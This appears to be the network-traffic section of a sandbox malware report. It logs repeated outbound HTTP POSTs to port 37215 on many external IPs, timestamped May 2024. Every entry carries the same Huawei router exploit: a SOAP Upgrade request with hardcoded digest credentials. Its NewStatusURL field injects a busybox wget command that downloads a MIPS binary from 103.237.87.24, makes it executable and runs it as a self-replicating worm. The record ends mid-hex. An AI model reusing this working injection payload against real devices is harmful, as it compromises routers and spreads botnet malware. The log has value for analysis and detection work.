                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  849192.168.2.133500473.117.88.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.374691010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  850192.168.2.1347978157.33.126.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.375013113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  851192.168.2.133991441.97.149.6137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.375017881 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  852192.168.2.135717048.223.110.14237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.375025988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  853192.168.2.1339882157.130.191.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.375051022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  854192.168.2.1348668177.181.171.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.375052929 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  855192.168.2.1342742157.117.125.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.375062943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  856192.168.2.1359954197.244.156.22137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.375081062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  857192.168.2.135359841.252.151.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.375092983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  858192.168.2.134838841.193.41.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.375102997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 